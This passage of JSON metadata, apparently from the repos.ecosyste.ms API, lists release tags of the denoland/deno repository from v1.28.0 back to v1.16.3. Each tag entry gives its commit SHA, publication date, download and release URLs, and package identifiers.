/repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/